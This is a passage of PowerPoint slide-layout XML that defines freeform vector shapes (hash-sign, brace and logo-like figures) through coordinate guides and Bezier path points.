                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>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2" name="Freeform 139"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 140"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 141"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="4023"/>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Freeform 142"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 143"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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7" name="Freeform 144"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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8" name="Freeform 145"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 146"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 147"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="4027"/>
                <a:ext cx="189" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 62 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 122 w 189"/>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20">
                    <a:moveTo>
                      <a:pt x="189" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 149"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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4" name="Freeform 151"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="4027"/>
                <a:ext cx="76" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 21 w 63"/>
                  <a:gd name="T3" fmla="*/ 199 h 241"/>
                  <a:gd name="T4" fmla="*/ 21 w 63"/>
                  <a:gd name="T5" fmla="*/ 158 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 129 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 113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7 w 63"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 224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1"/>
                      <a:pt x="21" y="227"/>
                      <a:pt x="21" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="139"/>
                      <a:pt x="14" y="130"/>
                      <a:pt x="0" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="1"/>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7"/>
                      <a:pt x="42" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="213"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="224"/>
                      <a:pt x="63" y="224"/>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Freeform 154"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="4027"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 129 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 158 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 199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9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="130"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="41" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="227"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="224"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="213"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="137"/>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8" y="112"/>
                      <a:pt x="63" y="113"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63"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Freeform 155"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="401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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="171"/>
                      <a:pt x="174" y="172"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="187"/>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199"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="81" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54"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5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>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80"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="7" y="192"/>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0"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>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3"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="139"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4" y="160"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>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2" y="189"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="67"/>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2"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="38" y="140"/>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7"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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8"/>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7"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4"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>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2"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
